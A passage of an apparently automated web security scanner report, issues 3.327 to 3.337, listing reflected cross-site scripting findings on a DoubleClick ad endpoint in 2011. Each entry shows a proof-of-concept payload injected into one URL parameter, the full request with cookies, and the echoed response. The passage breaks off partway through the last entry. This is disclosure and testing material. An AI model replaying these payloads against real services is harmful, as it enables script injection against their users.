3.327. http://ad.doubleclick.net/adi/N5996.2496.0512158326521/B5372452.3 [epartner parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adi/N5996.2496.0512158326521/B5372452.3

Issue detail

The value of the epartner request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c79ec"-alert(1)-"b8a7c4334dd was submitted in the epartner parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /adi/N5996.2496.0512158326521/B5372452.3;sz=300x250;pc=cbs511581;click0=http://adlog.com.com/adlog/e/r=7108&sg=511581&o=1%253A23236%253A151%253A&h=cn&p=&b=4&l=&site=6&pt=2000&nd=1&pid=&cid=&pp=100&e=&rqid=01c13-ad-e6:4DB89CF8CB238&orh=&oepartner=&epartner=c79ec"-alert(1)-"b8a7c4334dd&ppartner=&pdom=&cpnmodule=&count=&ra=173.193.214.243&pg=6ThqigoPCX4AAGgqHuYAAAAE&t=2011.04.27.23.36.34&event=58/;ord=2011.04.27.23.36.34? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.gamespot.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Wed, 27 Apr 2011 23:41:13 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 6917

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve
...[SNIP]...
B%3B%7Esscs%3D%3fhttp://adlog.com.com/adlog/e/r=7108&sg=511581&o=1%253A23236%253A151%253A&h=cn&p=&b=4&l=&site=6&pt=2000&nd=1&pid=&cid=&pp=100&e=&rqid=01c13-ad-e6:4DB89CF8CB238&orh=&oepartner=&epartner=c79ec"-alert(1)-"b8a7c4334dd&ppartner=&pdom=&cpnmodule=&count=&ra=173.193.214.243&pg=6ThqigoPCX4AAGgqHuYAAAAE&t=2011.04.27.23.36.34&event=58/http://www.gamespot.com/xbox360/action/call-of-juarez-the-cartel/video/6310177?tag=gumba
...[SNIP]...

3.328. http://ad.doubleclick.net/adi/N5996.2496.0512158326521/B5372452.3 [event parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adi/N5996.2496.0512158326521/B5372452.3

Issue detail

The value of the event request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload f6d9c"-alert(1)-"5626e508392 was submitted in the event parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /adi/N5996.2496.0512158326521/B5372452.3;sz=300x250;pc=cbs511581;click0=http://adlog.com.com/adlog/e/r=7108&sg=511581&o=1%253A23236%253A151%253A&h=cn&p=&b=4&l=&site=6&pt=2000&nd=1&pid=&cid=&pp=100&e=&rqid=01c13-ad-e6:4DB89CF8CB238&orh=&oepartner=&epartner=&ppartner=&pdom=&cpnmodule=&count=&ra=173.193.214.243&pg=6ThqigoPCX4AAGgqHuYAAAAE&t=2011.04.27.23.36.34&event=f6d9c"-alert(1)-"5626e508392 HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.gamespot.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Content-Length: 6905
Cache-Control: no-cache
Pragma: no-cache
Date: Wed, 27 Apr 2011 23:42:28 GMT
Expires: Wed, 27 Apr 2011 23:42:28 GMT

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve
...[SNIP]...
6&pt=2000&nd=1&pid=&cid=&pp=100&e=&rqid=01c13-ad-e6:4DB89CF8CB238&orh=&oepartner=&epartner=&ppartner=&pdom=&cpnmodule=&count=&ra=173.193.214.243&pg=6ThqigoPCX4AAGgqHuYAAAAE&t=2011.04.27.23.36.34&event=f6d9c"-alert(1)-"5626e508392http://www.gamespot.com/xbox360/action/call-of-juarez-the-cartel/video/6310177?tag=gumballs%3Bimg%3B2");
var fscUrl = url;
var fscUrlClickTagFound = false;
var wmode = "opaque";
var bg = "";
var d
...[SNIP]...

3.329. http://ad.doubleclick.net/adi/N5996.2496.0512158326521/B5372452.3 [h parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adi/N5996.2496.0512158326521/B5372452.3

Issue detail

The value of the h request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 9a44f"-alert(1)-"16be16c856c was submitted in the h parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /adi/N5996.2496.0512158326521/B5372452.3;sz=300x250;pc=cbs511581;click0=http://adlog.com.com/adlog/e/r=7108&sg=511581&o=1%253A23236%253A151%253A&h=cn9a44f"-alert(1)-"16be16c856c&p=&b=4&l=&site=6&pt=2000&nd=1&pid=&cid=&pp=100&e=&rqid=01c13-ad-e6:4DB89CF8CB238&orh=&oepartner=&epartner=&ppartner=&pdom=&cpnmodule=&count=&ra=173.193.214.243&pg=6ThqigoPCX4AAGgqHuYAAAAE&t=2011.04.27.23.36.34&event=58/;ord=2011.04.27.23.36.34? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.gamespot.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Wed, 27 Apr 2011 23:38:55 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 6917

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve
...[SNIP]...
a/j%3B240444525%3B0-0%3B0%3B63339400%3B4307-300/250%3B41893241/41911028/1%3B%3B%7Eokv%3D%3Bpc%3Dcbs511581%3B%3B%7Esscs%3D%3fhttp://adlog.com.com/adlog/e/r=7108&sg=511581&o=1%253A23236%253A151%253A&h=cn9a44f"-alert(1)-"16be16c856c&p=&b=4&l=&site=6&pt=2000&nd=1&pid=&cid=&pp=100&e=&rqid=01c13-ad-e6:4DB89CF8CB238&orh=&oepartner=&epartner=&ppartner=&pdom=&cpnmodule=&count=&ra=173.193.214.243&pg=6ThqigoPCX4AAGgqHuYAAAAE&t=2011.04.27
...[SNIP]...

3.330. http://ad.doubleclick.net/adi/N5996.2496.0512158326521/B5372452.3 [l parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adi/N5996.2496.0512158326521/B5372452.3

Issue detail

The value of the l request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 35431"-alert(1)-"9cd71fd2ba9 was submitted in the l parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /adi/N5996.2496.0512158326521/B5372452.3;sz=300x250;pc=cbs511581;click0=http://adlog.com.com/adlog/e/r=7108&sg=511581&o=1%253A23236%253A151%253A&h=cn&p=&b=4&l=35431"-alert(1)-"9cd71fd2ba9&site=6&pt=2000&nd=1&pid=&cid=&pp=100&e=&rqid=01c13-ad-e6:4DB89CF8CB238&orh=&oepartner=&epartner=&ppartner=&pdom=&cpnmodule=&count=&ra=173.193.214.243&pg=6ThqigoPCX4AAGgqHuYAAAAE&t=2011.04.27.23.36.34&event=58/;ord=2011.04.27.23.36.34? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.gamespot.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Wed, 27 Apr 2011 23:39:25 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 6917

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve
...[SNIP]...
44525%3B0-0%3B0%3B63339400%3B4307-300/250%3B41893241/41911028/1%3B%3B%7Eokv%3D%3Bpc%3Dcbs511581%3B%3B%7Esscs%3D%3fhttp://adlog.com.com/adlog/e/r=7108&sg=511581&o=1%253A23236%253A151%253A&h=cn&p=&b=4&l=35431"-alert(1)-"9cd71fd2ba9&site=6&pt=2000&nd=1&pid=&cid=&pp=100&e=&rqid=01c13-ad-e6:4DB89CF8CB238&orh=&oepartner=&epartner=&ppartner=&pdom=&cpnmodule=&count=&ra=173.193.214.243&pg=6ThqigoPCX4AAGgqHuYAAAAE&t=2011.04.27.23.36.34&
...[SNIP]...

3.331. http://ad.doubleclick.net/adi/N5996.2496.0512158326521/B5372452.3 [nd parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adi/N5996.2496.0512158326521/B5372452.3

Issue detail

The value of the nd request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 83318"-alert(1)-"9a419acb350 was submitted in the nd parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /adi/N5996.2496.0512158326521/B5372452.3;sz=300x250;pc=cbs511581;click0=http://adlog.com.com/adlog/e/r=7108&sg=511581&o=1%253A23236%253A151%253A&h=cn&p=&b=4&l=&site=6&pt=2000&nd=183318"-alert(1)-"9a419acb350&pid=&cid=&pp=100&e=&rqid=01c13-ad-e6:4DB89CF8CB238&orh=&oepartner=&epartner=&ppartner=&pdom=&cpnmodule=&count=&ra=173.193.214.243&pg=6ThqigoPCX4AAGgqHuYAAAAE&t=2011.04.27.23.36.34&event=58/;ord=2011.04.27.23.36.34? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.gamespot.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Wed, 27 Apr 2011 23:39:54 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 6917

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve
...[SNIP]...
339400%3B4307-300/250%3B41893241/41911028/1%3B%3B%7Eokv%3D%3Bpc%3Dcbs511581%3B%3B%7Esscs%3D%3fhttp://adlog.com.com/adlog/e/r=7108&sg=511581&o=1%253A23236%253A151%253A&h=cn&p=&b=4&l=&site=6&pt=2000&nd=183318"-alert(1)-"9a419acb350&pid=&cid=&pp=100&e=&rqid=01c13-ad-e6:4DB89CF8CB238&orh=&oepartner=&epartner=&ppartner=&pdom=&cpnmodule=&count=&ra=173.193.214.243&pg=6ThqigoPCX4AAGgqHuYAAAAE&t=2011.04.27.23.36.34&event=58/http://www.
...[SNIP]...

3.332. http://ad.doubleclick.net/adi/N5996.2496.0512158326521/B5372452.3 [o parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adi/N5996.2496.0512158326521/B5372452.3

Issue detail

The value of the o request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 613dc"-alert(1)-"d7cb0fb0487 was submitted in the o parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /adi/N5996.2496.0512158326521/B5372452.3;sz=300x250;pc=cbs511581;click0=http://adlog.com.com/adlog/e/r=7108&sg=511581&o=1%253A23236%253A151%253A613dc"-alert(1)-"d7cb0fb0487&h=cn&p=&b=4&l=&site=6&pt=2000&nd=1&pid=&cid=&pp=100&e=&rqid=01c13-ad-e6:4DB89CF8CB238&orh=&oepartner=&epartner=&ppartner=&pdom=&cpnmodule=&count=&ra=173.193.214.243&pg=6ThqigoPCX4AAGgqHuYAAAAE&t=2011.04.27.23.36.34&event=58/;ord=2011.04.27.23.36.34? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.gamespot.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Wed, 27 Apr 2011 23:38:46 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 6917

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve
...[SNIP]...
45/%2a/j%3B240444525%3B0-0%3B0%3B63339400%3B4307-300/250%3B41893241/41911028/1%3B%3B%7Eokv%3D%3Bpc%3Dcbs511581%3B%3B%7Esscs%3D%3fhttp://adlog.com.com/adlog/e/r=7108&sg=511581&o=1%253A23236%253A151%253A613dc"-alert(1)-"d7cb0fb0487&h=cn&p=&b=4&l=&site=6&pt=2000&nd=1&pid=&cid=&pp=100&e=&rqid=01c13-ad-e6:4DB89CF8CB238&orh=&oepartner=&epartner=&ppartner=&pdom=&cpnmodule=&count=&ra=173.193.214.243&pg=6ThqigoPCX4AAGgqHuYAAAAE&t=2011.
...[SNIP]...

3.333. http://ad.doubleclick.net/adi/N5996.2496.0512158326521/B5372452.3 [oepartner parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adi/N5996.2496.0512158326521/B5372452.3

Issue detail

The value of the oepartner request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 27e41"-alert(1)-"454b33c376a was submitted in the oepartner parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /adi/N5996.2496.0512158326521/B5372452.3;sz=300x250;pc=cbs511581;click0=http://adlog.com.com/adlog/e/r=7108&sg=511581&o=1%253A23236%253A151%253A&h=cn&p=&b=4&l=&site=6&pt=2000&nd=1&pid=&cid=&pp=100&e=&rqid=01c13-ad-e6:4DB89CF8CB238&orh=&oepartner=27e41"-alert(1)-"454b33c376a&epartner=&ppartner=&pdom=&cpnmodule=&count=&ra=173.193.214.243&pg=6ThqigoPCX4AAGgqHuYAAAAE&t=2011.04.27.23.36.34&event=58/;ord=2011.04.27.23.36.34? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.gamespot.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Wed, 27 Apr 2011 23:41:03 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 6917

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve
...[SNIP]...
bs511581%3B%3B%7Esscs%3D%3fhttp://adlog.com.com/adlog/e/r=7108&sg=511581&o=1%253A23236%253A151%253A&h=cn&p=&b=4&l=&site=6&pt=2000&nd=1&pid=&cid=&pp=100&e=&rqid=01c13-ad-e6:4DB89CF8CB238&orh=&oepartner=27e41"-alert(1)-"454b33c376a&epartner=&ppartner=&pdom=&cpnmodule=&count=&ra=173.193.214.243&pg=6ThqigoPCX4AAGgqHuYAAAAE&t=2011.04.27.23.36.34&event=58/http://www.gamespot.com/xbox360/action/call-of-juarez-the-cartel/video/6310177
...[SNIP]...

3.334. http://ad.doubleclick.net/adi/N5996.2496.0512158326521/B5372452.3 [orh parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adi/N5996.2496.0512158326521/B5372452.3

Issue detail

The value of the orh request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 3ed53"-alert(1)-"801fbb30cd5 was submitted in the orh parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /adi/N5996.2496.0512158326521/B5372452.3;sz=300x250;pc=cbs511581;click0=http://adlog.com.com/adlog/e/r=7108&sg=511581&o=1%253A23236%253A151%253A&h=cn&p=&b=4&l=&site=6&pt=2000&nd=1&pid=&cid=&pp=100&e=&rqid=01c13-ad-e6:4DB89CF8CB238&orh=3ed53"-alert(1)-"801fbb30cd5&oepartner=&epartner=&ppartner=&pdom=&cpnmodule=&count=&ra=173.193.214.243&pg=6ThqigoPCX4AAGgqHuYAAAAE&t=2011.04.27.23.36.34&event=58/;ord=2011.04.27.23.36.34? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.gamespot.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Wed, 27 Apr 2011 23:40:53 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 6917

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve
...[SNIP]...
3D%3Bpc%3Dcbs511581%3B%3B%7Esscs%3D%3fhttp://adlog.com.com/adlog/e/r=7108&sg=511581&o=1%253A23236%253A151%253A&h=cn&p=&b=4&l=&site=6&pt=2000&nd=1&pid=&cid=&pp=100&e=&rqid=01c13-ad-e6:4DB89CF8CB238&orh=3ed53"-alert(1)-"801fbb30cd5&oepartner=&epartner=&ppartner=&pdom=&cpnmodule=&count=&ra=173.193.214.243&pg=6ThqigoPCX4AAGgqHuYAAAAE&t=2011.04.27.23.36.34&event=58/http://www.gamespot.com/xbox360/action/call-of-juarez-the-cartel/vi
...[SNIP]...

3.335. http://ad.doubleclick.net/adi/N5996.2496.0512158326521/B5372452.3 [p parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adi/N5996.2496.0512158326521/B5372452.3

Issue detail

The value of the p request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload eec69"-alert(1)-"1b8e12f1a93 was submitted in the p parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /adi/N5996.2496.0512158326521/B5372452.3;sz=300x250;pc=cbs511581;click0=http://adlog.com.com/adlog/e/r=7108&sg=511581&o=1%253A23236%253A151%253A&h=cn&p=eec69"-alert(1)-"1b8e12f1a93&b=4&l=&site=6&pt=2000&nd=1&pid=&cid=&pp=100&e=&rqid=01c13-ad-e6:4DB89CF8CB238&orh=&oepartner=&epartner=&ppartner=&pdom=&cpnmodule=&count=&ra=173.193.214.243&pg=6ThqigoPCX4AAGgqHuYAAAAE&t=2011.04.27.23.36.34&event=58/;ord=2011.04.27.23.36.34? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.gamespot.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Wed, 27 Apr 2011 23:39:05 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 6917

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve
...[SNIP]...
%3B240444525%3B0-0%3B0%3B63339400%3B4307-300/250%3B41893241/41911028/1%3B%3B%7Eokv%3D%3Bpc%3Dcbs511581%3B%3B%7Esscs%3D%3fhttp://adlog.com.com/adlog/e/r=7108&sg=511581&o=1%253A23236%253A151%253A&h=cn&p=eec69"-alert(1)-"1b8e12f1a93&b=4&l=&site=6&pt=2000&nd=1&pid=&cid=&pp=100&e=&rqid=01c13-ad-e6:4DB89CF8CB238&orh=&oepartner=&epartner=&ppartner=&pdom=&cpnmodule=&count=&ra=173.193.214.243&pg=6ThqigoPCX4AAGgqHuYAAAAE&t=2011.04.27.23
...[SNIP]...

3.336. http://ad.doubleclick.net/adi/N5996.2496.0512158326521/B5372452.3 [pdom parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adi/N5996.2496.0512158326521/B5372452.3

Issue detail

The value of the pdom request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 4bc9e"-alert(1)-"18701bf19fd was submitted in the pdom parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /adi/N5996.2496.0512158326521/B5372452.3;sz=300x250;pc=cbs511581;click0=http://adlog.com.com/adlog/e/r=7108&sg=511581&o=1%253A23236%253A151%253A&h=cn&p=&b=4&l=&site=6&pt=2000&nd=1&pid=&cid=&pp=100&e=&rqid=01c13-ad-e6:4DB89CF8CB238&orh=&oepartner=&epartner=&ppartner=&pdom=4bc9e"-alert(1)-"18701bf19fd&cpnmodule=&count=&ra=173.193.214.243&pg=6ThqigoPCX4AAGgqHuYAAAAE&t=2011.04.27.23.36.34&event=58/;ord=2011.04.27.23.36.34? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.gamespot.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Wed, 27 Apr 2011 23:41:33 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 6917

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve
...[SNIP]...
fhttp://adlog.com.com/adlog/e/r=7108&sg=511581&o=1%253A23236%253A151%253A&h=cn&p=&b=4&l=&site=6&pt=2000&nd=1&pid=&cid=&pp=100&e=&rqid=01c13-ad-e6:4DB89CF8CB238&orh=&oepartner=&epartner=&ppartner=&pdom=4bc9e"-alert(1)-"18701bf19fd&cpnmodule=&count=&ra=173.193.214.243&pg=6ThqigoPCX4AAGgqHuYAAAAE&t=2011.04.27.23.36.34&event=58/http://www.gamespot.com/xbox360/action/call-of-juarez-the-cartel/video/6310177?tag=gumballs%3Bimg%3B2");
...[SNIP]...

3.337. http://ad.doubleclick.net/adi/N5996.2496.0512158326521/B5372452.3 [pg parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adi/N5996.2496.0512158326521/B5372452.3

Issue detail

The value of the pg request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 5aec1"-alert(1)-"4e981761ccd was submitted in the pg parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

